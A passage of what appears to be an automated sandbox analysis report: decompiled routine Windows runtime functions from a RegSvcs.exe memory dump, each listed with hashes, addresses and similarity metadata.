                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction ID: 4e84480bcd741f0f714b1c71c9b43329eead79dccb17b03aa59902c2e24b172f
                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction Fuzzy Hash: 07E08C31A446809BEF27EB5CC650F5EBBF5FB44B04F180414A0085B670C628AC00CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130AAB0 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0130AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                          0x0130aab6
                                          0x0130aabb
                                          0x0135a442
                                          0x00000000
                                          0x0135a448
                                          0x0135a454
                                          0x0135a454
                                          0x0130aac1
                                          0x0130aac1
                                          0x0130aac6
                                          0x0130aac6

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction ID: 6bc4b058369079c744cec4c36db251d2040be421bd43440d58608f1aeccd55e9
                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction Fuzzy Hash: 44D0E975352A80CFE757CB5DC564B1577A4BB44B44FC50590E901CB762E62CD984CA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013235A1 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013235A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0130EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                          0x013235a1
                                          0x013235a1
                                          0x013235a5
                                          0x013235ab
                                          0x013235ab
                                          0x013235b5
                                          0x00000000
                                          0x013235c1
                                          0x013235b7

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction ID: 134f7a3254ace8e93a4b9621c97ae7a8007208e4506ff7490196e9dd1589e10e
                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction Fuzzy Hash: A4D0A931501195DAEB02BB18C2287683BB3BB0820CF782065C04A0699AC33E4A0AD600
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FDB40 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E012FDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01314620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                          0x012fdb4d
                                          0x012fdb54
                                          0x012fdb5f
                                          0x012fdb56
                                          0x012fdb56
                                          0x012fdb5c
                                          0x012fdb5c

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction ID: 0dc4fc464ea61664b636358fb8bcf3fa0d4a63febc819ed6fd7b7ff7ed99de88
                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction Fuzzy Hash: 5CC08C70290A06AAEB261F24CD01F007AA1BB10B09F4404A06300DA0F4EB7CD801E600
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0137A537 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0137A537(intOrPtr _a4, intOrPtr _a8) {

				return L01318E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                          0x0137a553

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction ID: 88082712130357b78918e975c67d742dee6d1a57bc9ccec4afb5883810e92a12
                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction Fuzzy Hash: 7EC08C33180248BBCB126F85CC00F06BF2AFBA4B60F008010FA080B570C632E970EB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01313A1C Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01313A1C(intOrPtr _a4) {
				void* _t5;

				return L01314620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                          0x01313a35

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction ID: 9f5fd09c23ce03081d3ba0a4bd120cf04d9b6c620d65dd10db02a95a0fab2c15
                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction Fuzzy Hash: DFC08C32080248BBC7126E45DC00F017B2AE7A4B60F000020B6040A5608636EC60D588
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FAD30 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E012FAD30(intOrPtr _a4) {

				return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                          0x012fad49

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction ID: bebfc8beab509e84d117834a364f9800415e773147cbf649b08c264ac99740a8
                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction Fuzzy Hash: 81C02B330C0248BBC7136F49CD00F117F2DE7A0B60F040020F6140B671C932EC61D588
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013076E2 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013076E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                          0x013076e4
                                          0x00000000
                                          0x013076f8
                                          0x013076fd

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction ID: 1bd2283f4d6912deb795a66b840225ea4c309ea266a2df998bc19c6e85621d17
                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction Fuzzy Hash: A6C08C702411885AEB2B570CCE30B303A90AB0861CF48019CAA92094E2C368B803C208
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013236CC Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013236CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                          0x013236d2
                                          0x013236e8
                                          0x013236d4
                                          0x013236e5
                                          0x013236e5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction ID: cf976677150c6b6c6ceb7a8550a052e1ac760d80197524a7259709fdab0137d7
                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction Fuzzy Hash: D3C02BB0151440FBD7292F34CD40F147258F704B39F640754B220454F0D62C9C00D100
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01317D50 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01317D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                          0x01317d56
                                          0x01317d5b
                                          0x01317d60
                                          0x01317d5d
                                          0x01317d5d
                                          0x01317d5d

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction ID: 280867705938cd2e97a0bc1f8fa9ce187b16f17c48493037c30936c5f3725000
                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction Fuzzy Hash: 8CB092353019408FCE1ADF18C080B1533F4BB48A84B8840D0E400CBA21D229E8008900
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01322ACB Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01322ACB() {
				void* _t5;

				return E0130EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                          0x01322adc

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: bb83edaf64cd33d8e82dbcc2ceeef07e121cb83cc1a6aabf9cd7dcd466bafee2
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: A1B01232D10841CFCF03FF44C620B1A7371FB00750F0548A0900127A70C228AC01DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339950 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4828a77cbe1443befea4c678ea44b8fa89313b5df55211102460e2e06ed1504
                                          • Instruction ID: 756b356390d65b8badcea5793e43d9d1787d8dd70f9aab7c6352e48ec767365a
                                          • Opcode Fuzzy Hash: b4828a77cbe1443befea4c678ea44b8fa89313b5df55211102460e2e06ed1504
                                          • Instruction Fuzzy Hash: 749002A530140403D540659948046070045A7E0346F51C021A2054595ECA699C557179
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013399D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e90f4b5c153cbebfaf7d5c32a25ceead9dce54ceeb95ba57fd152f8b78e4419
                                          • Instruction ID: 1f201ac1247d801fb1d9fa704cb999a3c1f7771114ae7267e572bf62081dbd7c
                                          • Opcode Fuzzy Hash: 6e90f4b5c153cbebfaf7d5c32a25ceead9dce54ceeb95ba57fd152f8b78e4419
                                          • Instruction Fuzzy Hash: 609002A531100043D504619944047060085A7F1245F51C022A2144594CC5699C656169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339820 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80ee67ae46e8b1628744628eaa68994a55716155287d34aabfce8264ecae85b0
                                          • Instruction ID: 010cb7898c1e5fca76dc3b8ed2223e7220afba2ffb0be0c0f34fee9f21e62d55
                                          • Opcode Fuzzy Hash: 80ee67ae46e8b1628744628eaa68994a55716155287d34aabfce8264ecae85b0
                                          • Instruction Fuzzy Hash: 5A90027534100403D541719944046060049B7E0285F91C022A0414594EC6959E5ABAA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0133B040 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ca5220302860a55feae38c660aa099275f0d8a8556dfb6c5cb0794e734591
                                          • Instruction ID: cb986218aeef8d4b7a72f5d34cc8a3d59789fd02280dc36f5843a9f764379375
                                          • Opcode Fuzzy Hash: bf6ca5220302860a55feae38c660aa099275f0d8a8556dfb6c5cb0794e734591
                                          • Instruction Fuzzy Hash: 8C9002A5701140438940B19948044065055B7F1345391C131A04445A0CC6A89C59A2A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013398A0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef2dbb96300cf6dfc86cccc738639a844f0069b43fa8bf93e9fd2e4660356623
                                          • Instruction ID: 00cdc0678566b3aa111db032f72f52df3d838c1c649125a9f4956d1ad7196ff1
                                          • Opcode Fuzzy Hash: ef2dbb96300cf6dfc86cccc738639a844f0069b43fa8bf93e9fd2e4660356623
                                          • Instruction Fuzzy Hash: BD90026530100403D502619944146060049E7E1389F91C022E1414595DC6659D57B176
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339B00 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 506a858d0b2698b8bfb9d1f9b742d38b1cf866d7c7abbb6cb9ed893d9882e4aa
                                          • Instruction ID: 9acbfa86286a012fdcd2fb2d0083048e733451c8b8957ec4e41cb58ebcce6e1b
                                          • Opcode Fuzzy Hash: 506a858d0b2698b8bfb9d1f9b742d38b1cf866d7c7abbb6cb9ed893d9882e4aa
                                          • Instruction Fuzzy Hash: 2590026534100803D540719984147070046E7E0645F51C021A0014594DC6569D6976F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0133A3B0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 759c5165cd4b5299ea400489d4e16d6623a735fb934615f3955a61bb6619ae2d
                                          • Instruction ID: 51af02bee9fe89939e1b6d91db2e241d19d464edf13654c2bce05e0c4bf09bf7
                                          • Opcode Fuzzy Hash: 759c5165cd4b5299ea400489d4e16d6623a735fb934615f3955a61bb6619ae2d
                                          • Instruction Fuzzy Hash: 9790027530144003D5407199844460B5045B7F0345F51C421E0415594CC6559C5AA265
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339A10 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 665121b0b3849f1634c47eca13597021629cf09990d8b7cc0f26570829e5928d
                                          • Instruction ID: d05518ad3a8d2d4caf5568ba245a600de24cfb19bbfe3c6f3656ad66b18f26f9
                                          • Opcode Fuzzy Hash: 665121b0b3849f1634c47eca13597021629cf09990d8b7cc0f26570829e5928d
                                          • Instruction Fuzzy Hash: 1990027530140403D500619948087470045A7E0346F51C021A5154595EC6A5DC957575
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339A80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d19b315cd2491860a8a59cc98a5b02dafb8856ac362fd8141142688cac6912c9
                                          • Instruction ID: 817a2cbd9d05fdf042fc7c7ebe7eccb1e8e9f9239af926bf8cd9404d89da16d3
                                          • Opcode Fuzzy Hash: d19b315cd2491860a8a59cc98a5b02dafb8856ac362fd8141142688cac6912c9
                                          • Instruction Fuzzy Hash: 5A90026530144443D54062994804B0F4145A7F1246F91C029A4146594CC9559C596765
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0133AD30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4adff0a167f36e0d8524d49d2f05488679efaeebe8602612ea10000851c2cf8
                                          • Instruction ID: fa4f4a9b2513214c9f4fda94f94f65c975d13f967c20e360e9d162a18945f578
                                          • Opcode Fuzzy Hash: d4adff0a167f36e0d8524d49d2f05488679efaeebe8602612ea10000851c2cf8
                                          • Instruction Fuzzy Hash: C1900275B0500013D540719948146464046B7F0785B55C021A0504594CC9949E5963E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c188b1bbc36552537bfb024d6e7ebbfb3178287d8a6c81882f50b4d56ae726e
                                          • Instruction ID: 6b9ac1a1bd96a400940a03957504ff2e920ec755c917685acf8381ca7824dba0
                                          • Opcode Fuzzy Hash: 4c188b1bbc36552537bfb024d6e7ebbfb3178287d8a6c81882f50b4d56ae726e
                                          • Instruction Fuzzy Hash: C69002E5301140938900A2998404B0A4545A7F0245B51C026E10445A0CC5659C55A179
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339560 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 434cf4358c5956be4136745e78d426cd2e79fb081c283383d4e67a657b93f1d0
